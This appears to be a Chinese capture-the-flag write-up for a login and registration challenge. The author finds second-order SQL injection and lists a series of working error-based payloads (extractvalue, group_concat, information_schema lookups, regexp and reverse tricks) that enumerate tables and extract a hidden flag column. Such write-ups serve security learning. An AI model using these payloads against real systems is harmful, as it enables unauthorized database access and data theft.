获取real_flag_1s_here字段中的字段值,发现被隐藏
根据题目发现是一个登录注册界面,估计是二次注入,注册一个带有”的账号,发现报错,那么采用报错注入来获取flag
命令:1"&&(extractvalue(1,concat(1,(select(database())))))#
命令:1"&&(extractvalue(1,concat(1,(select(group_concat(table_name))from(information_schema.tables)where(table_schema="web_sqli")))))#
命令:1"&&(extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')))))#
命令:1"&&(extractvalue(1,concat(1,(select(group_concat(flag))from(flag)))))#
命令:1"&&(extractvalue(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')))))#
命令:1"&&(extractvalue(1,concat(1,(select(group_concat(real_flag_1s_here))from(users)))))#
命令:1"&&(extractvalue(1,concat(1,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^P')))))#
命令:1"&&(extractvalue(1,concat(1,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^P'))))))#